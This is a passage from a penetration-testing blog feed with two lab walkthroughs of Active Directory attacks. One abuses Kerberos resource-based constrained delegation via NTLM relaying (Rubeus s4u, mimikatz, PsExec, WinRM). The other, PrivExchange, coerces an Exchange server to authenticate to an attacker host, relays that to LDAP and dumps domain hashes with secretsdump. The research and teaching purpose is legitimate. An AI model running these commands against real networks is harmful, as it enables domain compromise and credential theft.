<p>The service ticket for <code class="language-plaintext highlighter-rouge">cifs</code> on the target as the domain admin has been imported into the cache on our box, and can be displayed with <code class="language-plaintext highlighter-rouge">klist</code>. We see taht the ticket is valid for the client <code class="language-plaintext highlighter-rouge">lkys@lab.local</code> on the <code class="language-plaintext highlighter-rouge">cifs</code> sname on the computer <code class="language-plaintext highlighter-rouge">ws02.lab.local</code>.</p>
<p><img src="../assets/img/relaydelegation/2019-04-14-16-18-29.png" alt="" /></p>
<p>We now have read access on the target host, as this ticket is used for authentication.</p>
<p><img src="../assets/img/relaydelegation/2019-04-14-16-25-22.png" alt="" /></p>
<p><em>Note that for getting command execution on the target through psexec or wmi, we need local admin on the host we are on. Without local admin we will not be able to perform psexec, wmiexec, etc. That’s why it’s a good idea to do this from your attacking host.</em></p>
<h3 id="command-execution-1">Command execution</h3>
<p>We can perform psexec locally from Windows since it works with <code class="language-plaintext highlighter-rouge">CIFS</code> tickets</p>
<p><code class="language-plaintext highlighter-rouge">.\PsExec64.exe \\ws02.lab.local cmd</code></p>
<p><img src="../assets/img/relaydelegation/2019-04-14-16-25-51.png" alt="" /></p>
<h3 id="winrm">WinRM</h3>
<p>Another possible way of remote code execution with a service ticket is the native WinRM. We can do this with Rubeus similarly to above before, but this time request another ticket with an additional service specified. We are going to specify that we want a <code class="language-plaintext highlighter-rouge">http</code> ticket, which is required for WinRM.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.\Rubeus.exe s4u /user:LUJCDPUQ$ /impersonateuser:lkys /msdsspn:"cifs/ws02.lab.local" /ptt /rc4:3116C16787230147050F6835AFBF5EDF /altservice:http
</code></pre></div></div>
<p>We now have the <code class="language-plaintext highlighter-rouge">http</code> service ticket impersonating the domain admin <code class="language-plaintext highlighter-rouge">lkys</code> on <code class="language-plaintext highlighter-rouge">WS02</code> imported.</p>
<p><img src="../assets/img/relaydelegation/2019-04-14-16-44-39.png" alt="" /></p>
<p>And we can start a remote session on <code class="language-plaintext highlighter-rouge">WS02</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Enter-PSSession -ComputerName ws02.lab.local
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-16-45-20.png" alt="" /></p>
<p>Inside the session we can see the TGS we used to authenticate with.</p>
<p><img src="../assets/img/relaydelegation/2019-04-14-16-47-15.png" alt="" /></p>
<h2 id="further-research">Further research</h2>
<h3 id="rdp">RDP</h3>
<p>So, what if we are somehow blocked from getting command execution using PsExec, WinRM and similar? If we imagine that RDP is the only way we can get remote access it’s worth looking into whether it is possible to pass a service ticket to RDP. If this is the case, it could mean there are ways of getting command execution on hosts through a service ticket without the requirement of being local administrator on the target host.</p>
<p>However, we can’t see any specific parameter in RDP for passing a ticket, so this might get tricky. The <code class="language-plaintext highlighter-rouge">restrictedadmin</code> feature is of interest though.</p>
<p><img src="../assets/img/relaydelegation/2019-04-14-17-07-07.png" alt="" /></p>
<p>Mimikatz can pass the ticket, but our <code class="language-plaintext highlighter-rouge">cifs</code> and <code class="language-plaintext highlighter-rouge">http</code> tickets aren’t valid for RDP, we need a <code class="language-plaintext highlighter-rouge">termsrv</code> ticket. So similar to before, we request one with Rubeus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.\Rubeus.exe s4u /user:LUJCDPUQ$ /impersonateuser:lkys /msdsspn:"cifs/ws02.lab.local" /ptt /rc4:3116C16787230147050F6835AFBF5EDF /altservice:termsrv
</code></pre></div></div>
<p>We open mimikatz and list the tickets. As we can see, it’s been imported into the cache by the above commands so we don’t have to import it “again”. See the section below this one if you want to do exactly that.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.\mimikatz.exe
kerberos::list
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-17-05-04.png" alt="" /></p>
<p>Now start an RDP session with <code class="language-plaintext highlighter-rouge">restrictedadmin</code> which should in theory use the <code class="language-plaintext highlighter-rouge">termsrv</code> ticket that is cached</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>process::start "mstsc /restrictedadmin /v:ws02.lab.local"
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-17-16-42.png" alt="" /></p>
<p>But it does not appear to work, and I spent quite a lot of time researching this without getting to the bottom of it. It appears that RDP requires a TGT, which we don’t have to request a <code class="language-plaintext highlighter-rouge">termsrv</code> ticket of its own, and since we simply don’t have that it fails to authenticate. I even initiated some dialogue with Benjamin Delpy about this on <a href="https://twitter.com/chryzsh/status/1107751511583543296">Twitter</a>.</p>
<p>I did also try to find a way to do WMI remote code execution from Windows using a service ticket, but could not figure out any working method. <strong>Ideas on any of the two? Please message me on Twitter.</strong></p>
<h3 id="spn-to-service-mappings">SPN to service mappings</h3>
<p>For the record, here is a reference for tickets necessary for different types of access
<a href="https://adsecurity.org/?page_id=183">Exhaustive list at Adsecurity</a></p>
<h3 id="speeding-up-the-attack">Speeding up the attack</h3>
<p>If the attack is spending a lot of time enumerating privileges and such, we can speed it up by disabling a few features in <code class="language-plaintext highlighter-rouge">ntlmrelayx</code>. This also ensures we are not executing other attacks like trying to add domain admins or perform ACL modifications.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ntlmrelayx.py -t ldaps://dc01.lab.local --delegate-access --no-smb-server -wh attacker-wpad-no-dump --no-da --no-acl --no-validate-privs
</code></pre></div></div>
<h3 id="exporting-the-ticket-from-linux-to-windows">Exporting the ticket from Linux to Windows</h3>
<p>If we want to import ticket to Windows without redoing the s4u.</p>
<p>First, export the ticket to a kirbi file that can be used with Mimikatz using <a href="https://github.com/rvazarkar/KrbCredExport">KrbCredExport</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python KrbCredExport/KrbCredExport.py lkys.ccache lkys.kirbi
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-17-20-37.png" alt="" /></p>
<p>Transfer the ticket over to the Windows host, and import the ticket into the session with mimikatz.</p>
<p><img src="../assets/img/relaydelegation/2019-04-14-17-22-08.png" alt="" /></p>
<p>Can now access the target <code class="language-plaintext highlighter-rouge">c$</code> share</p>
<p><img src="../assets/img/relaydelegation/2019-04-14-17-21-41.png" alt="" /></p>
<h3 id="performing-the-attack-manually">Performing the attack manually</h3>
<p>This requires that we have a user with <code class="language-plaintext highlighter-rouge">GenericWrite</code> rights over the machine account for the computer we are targeting. By default, domain user accounts will not have that unless they are the Creator of the machine account. Harmj0y posted a <a href="https://gist.github.com/HarmJ0y/224dbfef83febdaf885a8451e40d52ff">gist</a> on how to do this.</p>
<h3 id="domain-controller-doesnt-have-a-certificate-for-ldap">Domain controller doesn’t have a certificate for LDAP</h3>
<p>It could be LDAPS is simply not configured, which means there is no certificate installed for LDAP on the domain controller. This is what is looks like if we try to add a machine account using ntlmrelayx with relaying to LDAP without TLS.</p>
<p><img src="../assets/img/relaydelegation/2019-04-14-13-49-28.png" alt="" /></p>
<p>If we somehow already have access to a domain user, we can get around this by adding a machine account manually with <a href="https://github.com/Kevin-Robertson/Powermad">Powermad</a>. This works over LDAP without TLS because Windows will use GSSAPI signing and sealing if required, which also encrypts the packets. This is different than LDAPS, because signing and/or sealing is not performed when relaying because the negotiated session key can’t be obtained. Thanks for this clarification, @elad_shamir and @dirkjanm!</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>New-MachineAccount -MachineAccount test -Domain lab.local -DomainController dc01.lab.local -Credential chry
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-17-27-54.png" alt="" /></p>
<p>Note that above I need to specify a domain context using a domain user, because I was executing the script from a non-domain joined machine.</p>
<p>Now when doing the relaying, specify to use the newly created machine account with the <code class="language-plaintext highlighter-rouge">—escalate-user</code> parameter followed by the machine account we added. Note here that we specify <code class="language-plaintext highlighter-rouge">ldap</code> and not <code class="language-plaintext highlighter-rouge">ldaps</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ntlmrelayx.py -t ldap://dc01.lab.local --delegate-access --no-smb-server -wh attacker-wpad --no-da --no-acl --no-validate-privs --escalate-user test$
</code></pre></div></div>
<p><img src="../assets/img/relaydelegation/2019-04-14-17-45-34.png" alt="" /></p>
<p>Once the attack has been performed, the computer we targeted should have the account we added in the <code class="language-plaintext highlighter-rouge">PrincipalsAllowedToDelegateToAccount</code> attribute, in addition to the machine account which was created when I executed the attack earlier.</p>
<p><code class="language-plaintext highlighter-rouge">Get-ADComputer WS02 -Properties PrincipalsAllowedToDelegateToAccount</code></p>
<p><img src="../assets/img/relaydelegation/2019-04-14-17-46-31.png" alt="" /></p>
<p>And from here we can request a ticket like before and execute the rest of the attack.</p>
<h2 id="questions">Questions</h2>
<h3 id="1---are-we-relaying-the-domain-user-or-machine-account">1 - Are we relaying the domain user or machine account?</h3>
<p>What we relay here is the machine account credentials, <strong>not</strong> the user credentials like with WPAD relaying attacks on IPv4. This confused me in the beginning, so I just wanted to make that abundantly clear.</p>
<h3 id="2--can-we-configure-delegation-for-a-domain-user-in-our-control">2- Can we configure delegation for a domain user in our control?</h3>
<p>No, we can’t simply tell the DC to set the delegation privileges on the computer object to our domain user, because that user has no SPN, so <code class="language-plaintext highlighter-rouge">s4u</code> would not work. The domain user does not have the necessary privileges to configure an SPN on itself either, as this would allow any user to turn itself into a service account.</p>
<p>I did some experiments with this with another user I created, and while you can configure delegation privileges on the computer object, the user account doesn’t have an SPN so Kerberos will simply say it can’t find the SPN during the <code class="language-plaintext highlighter-rouge">s4u2self</code> process.</p>
<p><img src="../assets/img/relaydelegation/2019-04-14-17-48-23.png" alt="" /></p>
<h3 id="3---cant-we-capture-and-relay-smb">3 - Can’t we capture and relay SMB?</h3>
<p>It is not possible to relay credentials from SMB to other protocols. That’s simply a protection integrated in Microsoft’s implementation of SMB authentication. dirkan wrote about this in the bottom half of his <a href="https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/">PrivExchange article</a>.</p>
<p>Update: vulnerabilities were published in 2019 that shows the bypass of NTLM relaying mitigations like SMB signing. Using a combination of these vulnerabilities, it is possible to relay SMB authentication to LDAP. See <a href="https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/">@dirkjanm’s article</a> for more details</p>
<h3 id="4---cant-we-capture-and-relay-httpwebdav">4 - Can’t we capture and relay HTTP/WebDAV?</h3>
<p>While you can relay credentials from HTTP/WebDAV to LDAP through tricks like dropping lnk files, those won’t relay the machine account credentials, only user account that accesses them. If you can find another way to get a machine account to contact you, that would work. That is basically what <a href="https://chryzsh.github.io/exploiting-privexchange/">PrivExchange</a> does.</p>
<h3 id="5---can-we-do-it-over-ipv4">5 - Can we do it over IPv4?</h3>
<p>Microsoft has patched the protocol fallback from DNS with <a href="https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077">MS16-077</a> where they removed both WPAD config broadcasts and automatic authentication to proxies. <del>The patch does not apply to IPv6, apparently.</del></p>
<p>Note: I misunderstood this earlier and had a big a-ha moment when I reread the <a href="https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/">mitm6 blog</a>. The patch indeed applies to IPv6, and the way mitm6 bypasses this patch is by letting the victim connect to the proxy, then prompt it for authentication by replying to it with <code class="language-plaintext highlighter-rouge">HTTP 407 Proxy Authentication</code> instead of the normal <code class="language-plaintext highlighter-rouge">HTTP 401</code> code.</p>
<h3 id="6---can-we-execute-it-without-relaying">6 - Can we execute it without relaying?</h3>
<p>Yes and no. There are a few possible scenarios here depending on your current level of access. The strict requirement for the attack access to an account with an SPN, and being able to configure resource-based constrained delegation on a computer object. As demonstrated in this article, both can be achieved by relaying a machine account’s credentials. Note that all attacks using these properties still require access to a Linux box on the network.</p>
<h4 id="scenario-0---nothing-new">Scenario 0 - Nothing new</h4>
<ul>
<li>Access to low privilege user</li>
<li><code class="language-plaintext highlighter-rouge">Machineaccountquota</code> > 0</li>
</ul>
<p>If we already have access to a low privilege user account, we can manually create a machine account, pop a shell with it’s context, but not configure delegation for the computer object of your victim. Consequently, this does not acquire you anything you can’t get with network access only. The only exception being that you might have a way to remotely reboot your target machine, but this is not a common scenario.</p>
<h4 id="scenario-1---local-privilege-escalation">Scenario 1 - Local Privilege Escalation</h4>
<ul>
<li>Access to host as low privilege user</li>
<li><code class="language-plaintext highlighter-rouge">Machineaccountquota</code> > 0</li>
</ul>
<p>This one is slightly more interesting as you can gain local privilege escalation by rebooting the target host. If you are a penetration tester and wish to demonstrate how your client is vulnerable, ask for a laptop, a low privilege user account and recreate this attack.</p>
<h3 id="further-work">Further work</h3>
<h4 id="executing-attacks-from-windows-hosts-only">Executing attacks from Windows hosts only</h4>
<p><a href="https://egre55.github.io">egre55</a> and I have been talking about the possibility of porting some of these tools to Windows binaries to possible execute the discussed attacks as a low or high privileged user in an AD domain. That would make these attack primitives even more dangerous from a defense perspective than the current scenario that requires root access to a Linux box on the same network.</p>
<h4 id="executing-similar-attacks-using-ipv4">Executing similar attacks using IPv4</h4>
<p>There have been many PoCs for such attacks, but they often have more strict requirements to fully work. I might publish a blog post detailing such attacks.</p>
<h2 id="links">Links</h2>
<ul>
<li><a href="https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/">The worst of both worlds: Combining NTLM Relaying and Kerberos delegation</a></li>
<li><a href="https://eladshamir.com/2019/01/28/Wagging-the-Dog.html">Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory</a></li>
<li><a href="https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/">mitm6 - compromising IPv4 networks via IPv6</a></li>
<li><a href="https://adsecurity.org/?page_id=183">List of SPNs at adsecurity.org</a></li>
<li><a href="https://www.secureauth.com/blog/kerberos-delegation-spns-and-more">Kerberos Delegation, SPNs and More</a></li>
</ul>c:\rusherA computer takeover attack through some funky relaying and abuse of Kerberos.Exploiting PrivExchange2019-04-11T08:02:00+00:002019-04-11T08:02:00+00:00https://chryzsh.github.io/exploiting-privexchange<p>This is not my discovery, and is merely an expansion and demo of how to use the PrivExchange exploit. See <a href="https://twitter.com/_dirkjan">_dirkjan</a>’s blog post <a href="https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/">Abusing Exchange: One API call away from Domain Admin</a> for the original discovery.</p>
<h2 id="overview">Overview</h2>
<p>The PrivExchange tool simply logs in on Exchange Web Services to subscribe to push notifications to a specific host. This will make the Exchange server’s machine account send its NTLMv2 hash back to the attacker host. As this machine account usually has severely high privileges in the domain, it can then be relayed to the domain controller to gain domain privilege escalation.</p>
<h2 id="prerequisites">Prerequisites</h2>
<ul>
<li><a href="https://github.com/dirkjanm/PrivExchange.git">PrivExchange</a> and <a href="https://github.com/SecureAuthCorp/impacket">Impacket</a> toolkit installed.</li>
<li>Domain Name, DC IP, Exchange Server, and your Attack host IP.</li>
<li>A host on the network with the ability to run your tools.</li>
<li>A valid domain user account and password, or NTLM hash.</li>
<li>
<p>A valid Exchange Server hostname or IP address. We can check this with <code class="language-plaintext highlighter-rouge">pth-net</code> from <a href="https://github.com/byt3bl33d3r/pth-toolkit">pth-toolkit</a></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pth-net rpc group members "Exchange Servers" -I dc01.lab.local -U lab/buff
</code></pre></div> </div>
</li>
</ul>
<p><img src="../assets/img/privexchange/rpc.jpg" alt="pth-net rpc" /></p>
<h3 id="the-different-components-of-the-attack">The different components of the attack</h3>
<ul>
<li><code class="language-plaintext highlighter-rouge">lab.local</code> - Domain name</li>
<li><code class="language-plaintext highlighter-rouge">dc01.lab.local</code> - Domain controller</li>
<li><code class="language-plaintext highlighter-rouge">mail01.lab.local</code> - Exchange server</li>
<li><code class="language-plaintext highlighter-rouge">192.168.0.142</code> - Attacker host</li>
</ul>
<h2 id="exploitation">Exploitation</h2>
<p>Run <code class="language-plaintext highlighter-rouge">ntlmrelayx</code> with the DC IP that we want to relay to, and specify a domain user we control, who we want to escalate privileges for.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ntlmrelayx.py -t ldap://dc01.lab.local --escalate-user buff
</code></pre></div></div>
<p><img src="../assets/img/privexchange/2019-04-11-10-27-34.png" alt="escalate-user buff" /></p>
<p>Use the “PrivExchange” tool to send push notification to your own NTLM Relay server. The <code class="language-plaintext highlighter-rouge">-ah</code> parameter is the <code class="language-plaintext highlighter-rouge">attacking host</code> and the following parameter is the Exchange server. We also have to give it the domain, username and password for the user we control. Note that the user must have a mailbox connected.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python privexchange.py -ah 192.168.0.142 mail01.lab.local -d lab.local -u chry -p Welcome1
</code></pre></div></div>
<p><img src="../assets/img/privexchange/2019-04-11-10-33-01.png" alt="" /></p>
<p>This should take exactly one minute. An HTTP connection comes in from the exchange server, and we request authentication from it. It replyed with the NTLMv2 hash of the <code class="language-plaintext highlighter-rouge">MAIL01$</code> machine account. We capture and relay the credentials over LDAP to the domain controller, which is used to modify the ACL privileges of our user to get DCsync rights.</p>
<p><img src="../assets/img/privexchange/2019-04-11-11-11-36.png" alt="" /></p>
<p>Once the user in our control obtains <code class="language-plaintext highlighter-rouge">Replication-Get-Changes-All</code> privileges in the domain we can run <code class="language-plaintext highlighter-rouge">secretsdump.py</code> to dump hashes from the domain controller.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>secretsdump.py lab/buff@192.168.0.2 -ntds ntds -history -just-dc-ntlm
</code></pre></div></div>
<p><img src="../assets/img/privexchange/2019-04-11-13-03-50.png" alt="" /></p>
<h3 id="wireshark">Wireshark</h3>
<p>We first see the API call on HTTPS go to the Exchange server. Followed by 1 minute of waiting, we see a connection negotitation happen initiated from the Exchange server, followed by our Kali box POSTing the <code class="language-plaintext highlighter-rouge">/privexchange</code> URL.</p>
<p><img src="../assets/img/privexchange/2019-04-11-10-44-01.png" alt="" /></p>
<p>Followed by the relay to LDAP
<img src="../assets/img/privexchange/2019-04-11-12-31-08.png" alt="" /></p>
<h2 id="cleanup">Cleanup</h2>
<h3 id="using-aclpwn">Using aclpwn</h3>
<p>Any ACL attack using <code class="language-plaintext highlighter-rouge">ntlmrelayx</code> saves a restore file that can be provided to <a href="https://github.com/fox-it/aclpwn.py">aclpwn.py</a> to restore the original permissions on the domain object.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python aclpwn.py --restore ../aclpwn-20190319-125741.restore
</code></pre></div></div>
<p><img src="../assets/img/privexchange/2019-04-11-12-27-42.png" alt="" /></p>
<h3 id="using-gui">Using GUI</h3>
<p>In <code class="language-plaintext highlighter-rouge">"Active Directory Users and Computers”</code>, enable <code class="language-plaintext highlighter-rouge">Advanced Features (in View Menu)</code>,<code class="language-plaintext highlighter-rouge">Right-click [Domain -> Security -> Advanced]</code>. Then look for the domain username account that you just gave <code class="language-plaintext highlighter-rouge">"Replicating Directory Changes”</code> and <code class="language-plaintext highlighter-rouge">"Replicating Directory Changes All”</code> privileges to and remove those Permission entries in the <code class="language-plaintext highlighter-rouge">"Allow”</code> checkboxes.</p>
<p><img src="../assets/img/relaydelegation/2019-04-17-10-45-07.png" alt="" /></p>
<p>We can use ADSI Edit to view the properties of the domain object, where we can see that the domain user account we gave DCsync privileges have those privileges:</p>
<p><img src="../assets/img/privexchange/2019-04-11-10-42-24.png" alt="" /></p>
<h2 id="links">Links</h2>
<ul>
<li><a href="https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/">https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/</a></li>
<li><a href="https://github.com/dirkjanm/PrivExchange">https://github.com/dirkjanm/PrivExchange</a> - Python</li>
<li><a href="https://github.com/G0ldenGunSec/PowerPriv">https://github.com/G0ldenGunSec/PowerPriv</a> - Powershell version</li>
<li><a href="https://github.com/panagioto/SharpExchangePriv">https://github.com/panagioto/SharpExchangePriv</a> - C#</li>
</ul>c:\rusherThis is not my discovery, and is merely an expansion and demo of how to use the PrivExchange exploit. See _dirkjan’s blog post Abusing Exchange: One API call away from Domain Admin for the original discovery.